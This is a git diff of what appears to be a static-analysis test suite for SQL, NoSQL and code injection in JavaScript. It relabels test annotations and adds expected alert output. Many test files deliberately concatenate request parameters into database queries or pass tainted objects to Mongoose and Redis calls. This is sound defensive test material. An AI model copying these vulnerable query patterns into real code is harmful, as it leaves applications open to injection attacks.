// $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteMany(query); + Document.deleteMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteOne(query); + Document.deleteOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.distinct('type', query); + Document.distinct('type', query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOne(query); + Document.findOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndDelete(query); + Document.findOneAndDelete(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndRemove(query); + Document.findOneAndRemove(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndUpdate(query); + Document.findOneAndUpdate(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.replaceOne(query); + Document.replaceOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.update(query); + Document.update(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateMany(query); + Document.updateMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateOne(query).then(X); + Document.updateOne(query).then(X); // $ Alert - query is tainted by user-provided object value - Document.findByIdAndUpdate(X, query, function(){}); // NOT OK + Document.findByIdAndUpdate(X, query, function(){}); // $ Alert - new Mongoose.Query(X, Y, query) // NOT OK - .and(query, function(){}) // NOT OK + new Mongoose.Query(X, Y, query) // $ Alert + .and(query, function(){}) // $ Alert ; - Document.where(query) // NOT OK - `.where()` on a Model. - .where(query) // NOT OK - `.where()` on a Query. - .and(query) // NOT OK - .or(query) // NOT OK - .distinct(X, query) // NOT OK - .comment(query) // OK - .count(query) // NOT OK + Document.where(query) // $ Alert - `.where()` on a Model. + .where(query) // $ Alert - `.where()` on a Query. + .and(query) // $ Alert + .or(query) // $ Alert + .distinct(X, query) // $ Alert + .comment(query) + .count(query) // $ Alert .exec() ; - Mongoose.createConnection(X).count(query); // OK (invalid program) - Mongoose.createConnection(X).model(Y).count(query); // NOT OK - Mongoose.createConnection(X).models[Y].count(query); // NOT OK - - Document.findOne(X, (err, res) => res.count(query)); // NOT OK - Document.findOne(X, (err, res) => err.count(query)); // OK - Document.findOne(X).exec((err, res) => res.count(query)); // NOT OK - Document.findOne(X).exec((err, res) => err.count(query)); // OK - Document.findOne(X).then((res) => res.count(query)); // NOT OK - Document.findOne(X).then(Y, (err) => err.count(query)); // OK - - Document.find(X, (err, res) => res[i].count(query)); // NOT OK - Document.find(X, (err, res) => err.count(query)); // OK - Document.find(X).exec((err, res) => res[i].count(query)); // NOT OK - Document.find(X).exec((err, res) => err.count(query)); // OK - Document.find(X).then((res) => res[i].count(query)); // NOT OK - Document.find(X).then(Y, (err) => err.count(query)); // OK - - Document.count(X, (err, res) => res.count(query)); // OK (res is a number) + Mongoose.createConnection(X).count(query); // OK - invalid program + Mongoose.createConnection(X).model(Y).count(query); // $ Alert + Mongoose.createConnection(X).models[Y].count(query); // $ Alert + + Document.findOne(X, (err, res) => res.count(query)); // $ Alert + Document.findOne(X, (err, res) => err.count(query)); + Document.findOne(X).exec((err, res) => res.count(query)); // $ Alert + Document.findOne(X).exec((err, res) => err.count(query)); + Document.findOne(X).then((res) => res.count(query)); // $ Alert + Document.findOne(X).then(Y, (err) => err.count(query)); + + Document.find(X, (err, res) => res[i].count(query)); // $ Alert + Document.find(X, (err, res) => err.count(query)); + Document.find(X).exec((err, res) => res[i].count(query)); // $ Alert + Document.find(X).exec((err, res) => err.count(query)); + Document.find(X).then((res) => res[i].count(query)); // $ Alert + Document.find(X).then(Y, (err) => err.count(query)); + + Document.count(X, (err, res) => res.count(query)); // OK - res is a number function innocent(X, Y, query) { // To detect if API-graphs were used incorrectly. return new Mongoose.Query("constant", "constant", "constant"); @@ -108,31 +94,31 @@ app.post('/documents/find', (req, res) => { } var C = getQueryConstructor(); - new C(X, Y, query); // NOT OK - - Document.findOneAndUpdate(X, query, function () { }); // NOT OK - - let id = req.query.id, cond = req.query.cond; - Document.deleteMany(cond); // NOT OK - Document.deleteOne(cond); // NOT OK - Document.geoSearch(cond); // NOT OK - Document.remove(cond); // NOT OK - Document.replaceOne(cond, Y); // NOT OK - Document.find(cond); // NOT OK - Document.findOne(cond); // NOT OK - Document.findById(id); // NOT OK - Document.findOneAndDelete(cond); // NOT OK - Document.findOneAndRemove(cond); // NOT OK - Document.findOneAndUpdate(cond, Y); // NOT OK - Document.update(cond, Y); // NOT OK - Document.updateMany(cond, Y); // NOT OK - Document.updateOne(cond, Y); // NOT OK - Document.find({ _id: id }); // NOT OK - Document.find({ _id: { $eq: id } }); // OK + new C(X, Y, query); // $ Alert + + Document.findOneAndUpdate(X, query, function () { }); // $ Alert + + let id = req.query.id, cond = req.query.cond; // $ Source + Document.deleteMany(cond); // $ Alert + Document.deleteOne(cond); // $ Alert + Document.geoSearch(cond); // $ Alert + Document.remove(cond); // $ Alert + Document.replaceOne(cond, Y); // $ Alert + Document.find(cond); // $ Alert + Document.findOne(cond); // $ Alert + Document.findById(id); // $ Alert + Document.findOneAndDelete(cond); // $ Alert + Document.findOneAndRemove(cond); // $ Alert + Document.findOneAndUpdate(cond, Y); // $ Alert + Document.update(cond, Y); // $ Alert + Document.updateMany(cond, Y); // $ Alert + Document.updateOne(cond, Y); // $ Alert + Document.find({ _id: id }); // $ Alert + Document.find({ _id: { $eq: id } }); if (Mongoose.Types.ObjectId.isValid(query)) { Document.findByIdAndUpdate(query, X, function(){}); // OK - is sanitized } else { - Document.findByIdAndUpdate(query, X, function(){}); // NOT OK + Document.findByIdAndUpdate(query, X, function(){}); // $ Alert } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js index a340bf2d968b..dedd3a7f8d2c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js @@ -17,9 +17,8 @@ const Document = Mongoose.model('Document', { app.get('/documents/find', (req, res) => { const query = {}; - query.title = JSON.parse(req.query.data).title; + query.title = JSON.parse(req.query.data).title; // $ Source - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js index f26ab52e7078..832cb465eb1c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js @@ -7,8 +7,8 @@ let app = express(); app.use(bodyParser.json()); app.post('/find', (req, res) => { - let v = JSON.parse(req.body.x); - MyModel.find({ id: v }); // NOT OK - MyModel.find({ id: req.body.id }); // NOT OK - MyModel.find({ id: `${req.body.id}` }); // OK + let v = JSON.parse(req.body.x); // $ Source + MyModel.find({ id: v }); // $ Alert + MyModel.find({ id: req.body.id }); // $ Alert + MyModel.find({ id: `${req.body.id}` }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js index de328fb49fae..150cf0d5a86a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js @@ -3,20 +3,20 @@ const mysql = require('mysql'); const pool = mysql.createPool(getConfig()); app.get("search", function handler(req, res) { - let temp = req.params.value; + let temp = req.params.value; // $ Source pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ?', // OK + sql: 'SELECT * FROM `books` WHERE `author` = ?', values: [temp] }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { - connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert function(error, results, fields) {}); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts index eaf46ad8cf85..759bc3e49476 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts @@ -4,8 +4,8 @@ export class Foo { db: IDatabase; onRequest(req, res) { - let taint = req.params.x; - this.db.one(taint); // NOT OK + let taint = req.params.x; // $ Source + this.db.one(taint); // $ Alert res.end(); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index d3f190dd1980..3d5e3cce7f0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -4,63 +4,63 @@ require('express')().get('/foo', (req, res) => { const db = pgp(process.env['DB_CONNECTION_STRING']); var query = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" - + req.params.category + "' ORDER BY PRICE"; + + req.params.category + "' ORDER BY PRICE"; // $ Source - db.any(query); // NOT OK - db.many(query); // NOT OK - db.manyOrNone(query); // NOT OK - db.map(query); // NOT OK - db.multi(query); // NOT OK - db.multiResult(query); // NOT OK - db.none(query); // NOT OK - db.one(query); // NOT OK - db.oneOrNone(query); // NOT OK - db.query(query); // NOT OK - db.result(query); // NOT OK + db.any(query); // $ Alert + db.many(query); // $ Alert + db.manyOrNone(query); // $ Alert + db.map(query); // $ Alert + db.multi(query); // $ Alert + db.multiResult(query); // $ Alert + db.none(query); // $ Alert + db.one(query); // $ Alert + db.oneOrNone(query); // $ Alert + db.query(query); // $ Alert + db.result(query); // $ Alert db.one({ - text: query // NOT OK + text: query // $ Alert }); db.one({ - text: 'SELECT * FROM news where id = $1', // OK - values: req.params.id, // OK + text: 'SELECT * FROM news where id = $1', + values: req.params.id, }); db.one({ text: 'SELECT * FROM news where id = $1:raw', - values: req.params.id, // NOT OK - interpreted as raw parameter + values: req.params.id, // $ Alert - interpreted as raw parameter }); db.one({ text: 'SELECT * FROM news where id = $1^', - values: req.params.id, // NOT OK + values: req.params.id, // $ Alert }); db.one({ text: 'SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3', values: [ - req.params.id, // NOT OK - req.params.name, // NOT OK + req.params.id, // $ Alert + req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - not using raw interpolation } }); db.one({ text: "SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE \"%${title}:value%\"", values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - :value cannot break out of single quotes - title: req.params.title, // NOT OK - enclosed by wrong type of quote + title: req.params.title, // $ Alert - enclosed by wrong type of quote } }); db.task(t => { - return t.one(query); // NOT OK + return t.one(query); // $ Alert }); db.taskIf( - { cnd: t => t.one(query) }, // NOT OK - t => t.one(query) // NOT OK + { cnd: t => t.one(query) }, // $ Alert + t => t.one(query) // $ Alert ); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js index 44a628a3c9e8..dda3cea18fac 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js @@ -7,47 +7,47 @@ const app = Express(); app.use(require('body-parser').json()); app.post('/documents/find', (req, res) => { - client.set(req.body.key, "value"); // NOT OK + client.set(req.body.key, "value"); // $ Alert - var key = req.body.key; + var key = req.body.key; // $ Source if (typeof key === "string") { - client.set(key, "value"); // OK + client.set(key, "value"); client.set(["key", "value"]); } - client.set(key, "value"); // NOT OK - client.hmset("key", "field", "value", key, "value2"); // NOT OK + client.set(key, "value"); // $ Alert + client.hmset("key", "field", "value", key, "value2"); // $ Alert // chain commands client .multi() .set("constant", "value") - .set(key, "value") // NOT OK - .get(key) // OK + .set(key, "value") // $ Alert + .get(key) .exec(function (err, replies) { }); client.duplicate((err, newClient) => { - newClient.set(key, "value"); // NOT OK + newClient.set(key, "value"); // $ Alert }); - client.duplicate().set(key, "value"); // NOT OK + client.duplicate().set(key, "value"); // $ Alert }); import { promisify } from 'util'; app.post('/documents/find', (req, res) => { - const key = req.body.key; - client.set(key, "value"); // NOT OK + const key = req.body.key; // $ Source + client.set(key, "value"); // $ Alert const setAsync = promisify(client.set).bind(client); - const foo1 = setAsync(key, "value"); // NOT OK + const foo1 = setAsync(key, "value"); // $ Alert client.setAsync = promisify(client.set); - const foo2 = client.setAsync(key, "value"); // NOT OK + const foo2 = client.setAsync(key, "value"); // $ Alert client.unrelated = promisify(() => {}); - const foo3 = client.unrelated(key, "value"); // OK + const foo3 = client.unrelated(key, "value"); const unrelated = promisify(client.foobar).bind(client); - const foo4 = unrelated(key, "value"); // OK + const foo4 = unrelated(key, "value"); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js index 494e2cb61089..5398d2d74e74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js @@ -7,7 +7,7 @@ var db = new sqlite3.Database(':memory:'); var io = require('socket.io')(); io.on('connection', (socket) => { - socket.on('newuser', (handle) => { - db.run(`INSERT INTO users(name) VALUES ${handle}`); + socket.on('newuser', (handle) => { // $ Source + db.run(`INSERT INTO users(name) VALUES ${handle}`); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js index 3b4d8ea6943c..0f5b6f992263 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js @@ -7,5 +7,5 @@ var db = new sqlite3.Database(':memory:'); var app = express(); app.get('/post/:id', function(req, res) { - db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"'); + db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js index b28ddabc9ca6..c68c7d295ca7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js @@ -3,8 +3,7 @@ const sql = require('mssql'); var app = express(); app.get('/post/:id', async function(req, res) { - // OK + sql.query`select * from mytable where id = ${req.params.id}`; - // NOT OK - new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); + new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js index 3f9aa21355d1..631dcb2faae3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js @@ -5,12 +5,12 @@ const pool = new pg.Pool(config); function handler(req, res) { var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" - + req.params.category + "' ORDER BY PRICE"; - pool.query(query1, [], function(err, results) { // BAD: the category might have SQL special characters in it + + req.params.category + "' ORDER BY PRICE"; // $ Source + pool.query(query1, [], function(err, results) { // $ Alert - the category might have SQL special characters in it // process results }); - // GOOD: use parameters + // OK - use parameters var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1" + " ORDER BY PRICE"; pool.query(query2, [req.params.category], function(err, results) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js index 73cddfb3a6ae..656dd5345a70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js @@ -5,5 +5,5 @@ var db = new sqlite3.Database(':memory:'); angular.module('myApp', ['ngRoute']) .controller('FindPost', function($routeParams) { - db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"'); + db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected index e536c54dbd2f..a81b9dbcce0f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected @@ -1,15 +1,80 @@ +#select +| NoSQLCodeInjection.js:18:24:18:37 | req.body.query | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | This code execution depends on a $@. | NoSQLCodeInjection.js:18:24:18:31 | req.body | user-provided value | +| NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:19:36:19:43 | req.body | user-provided value | +| NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:22:36:22:43 | req.body | user-provided value | +| actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | This code execution depends on a $@. | actions.js:4:10:4:50 | github. ... message | user-provided value | +| angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | This code execution depends on a $@. | angularjs.js:10:22:10:36 | location.search | user-provided value | +| angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | This code execution depends on a $@. | angularjs.js:13:23:13:37 | location.search | user-provided value | +| angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | This code execution depends on a $@. | angularjs.js:16:28:16:42 | location.search | user-provided value | +| angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | This code execution depends on a $@. | angularjs.js:19:22:19:36 | location.search | user-provided value | +| angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | This code execution depends on a $@. | angularjs.js:22:27:22:41 | location.search | user-provided value | +| angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | This code execution depends on a $@. | angularjs.js:25:23:25:37 | location.search | user-provided value | +| angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | This code execution depends on a $@. | angularjs.js:28:33:28:47 | location.search | user-provided value | +| angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | This code execution depends on a $@. | angularjs.js:31:28:31:42 | location.search | user-provided value | +| angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | This code execution depends on a $@. | angularjs.js:34:18:34:32 | location.search | user-provided value | +| angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | This code execution depends on a $@. | angularjs.js:40:18:40:32 | location.search | user-provided value | +| angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | This code execution depends on a $@. | angularjs.js:44:17:44:31 | location.search | user-provided value | +| angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. | angularjs.js:47:16:47:30 | location.search | user-provided value | +| angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | +| angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | +| express.js:6:24:6:69 | "return ... + "];" | express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | This code execution depends on a $@. | express.js:6:44:6:62 | req.param("wobble") | user-provided value | +| express.js:7:34:7:79 | "return ... + "];" | express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | This code execution depends on a $@. | express.js:7:54:7:72 | req.param("wobble") | user-provided value | +| express.js:9:8:9:53 | "return ... + "];" | express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | This code execution depends on a $@. | express.js:9:28:9:46 | req.param("wobble") | user-provided value | +| express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | This code execution depends on a $@. | express.js:11:22:11:54 | req.par ... ction") | user-provided value | +| express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | This code execution depends on a $@. | express.js:12:30:12:53 | req.par ... cript") | user-provided value | +| express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | This code execution depends on a $@. | express.js:13:37:13:70 | req.par ... odule") | user-provided value | +| express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:14:19:14:48 | req.par ... ntext") | user-provided value | +| express.js:20:34:20:38 | taint | express.js:19:17:19:35 | req.param("wobble") | express.js:20:34:20:38 | taint | This code execution depends on a $@. | express.js:19:17:19:35 | req.param("wobble") | user-provided value | +| express.js:36:15:36:19 | taint | express.js:27:17:27:35 | req.param("wobble") | express.js:36:15:36:19 | taint | This code execution depends on a $@. | express.js:27:17:27:35 | req.param("wobble") | user-provided value | +| express.js:43:10:43:12 | msg | express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | This code execution depends on a $@. | express.js:42:30:42:32 | msg | user-provided value | +| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | +| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value | +| react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-native.js:10:23:10:29 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:10:23:10:29 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react.js:10:56:10:77 | documen ... on.hash | react.js:10:56:10:77 | documen ... on.hash | react.js:10:56:10:77 | documen ... on.hash | This code execution depends on a $@. | react.js:10:56:10:77 | documen ... on.hash | user-provided value | +| template-sinks.js:20:17:20:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:20:17:20:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:21:16:21:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:21:16:21:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:22:18:22:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:22:18:22:24 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:23:17:23:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:23:17:23:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:24:18:24:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:24:18:24:24 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:25:16:25:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:25:16:25:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:26:27:26:33 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:26:27:26:33 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:27:21:27:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:27:21:27:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:28:17:28:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:28:17:28:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:29:24:29:30 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:29:24:29:30 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:30:21:30:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:30:21:30:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| tst.js:1:6:1:83 | documen ... t=")+8) | tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:1:6:1:27 | documen ... on.href | user-provided value | +| tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:3:12:3:33 | documen ... on.hash | user-provided value | +| tst.js:11:10:11:74 | documen ... , "$1") | tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:11:10:11:33 | documen ... .search | user-provided value | +| tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:13:21:13:42 | documen ... on.hash | user-provided value | +| tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:15:30:15:51 | documen ... on.hash | user-provided value | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:6:17:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:17:11:17:32 | documen ... on.hash | user-provided value | +| tst.js:19:26:19:53 | locatio ... ring(1) | tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:19:26:19:40 | location.search | user-provided value | +| tst.js:24:18:24:23 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:24:18:24:23 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:26:14:26:19 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:26:14:26:19 | source | This code execution depends on a $@. | 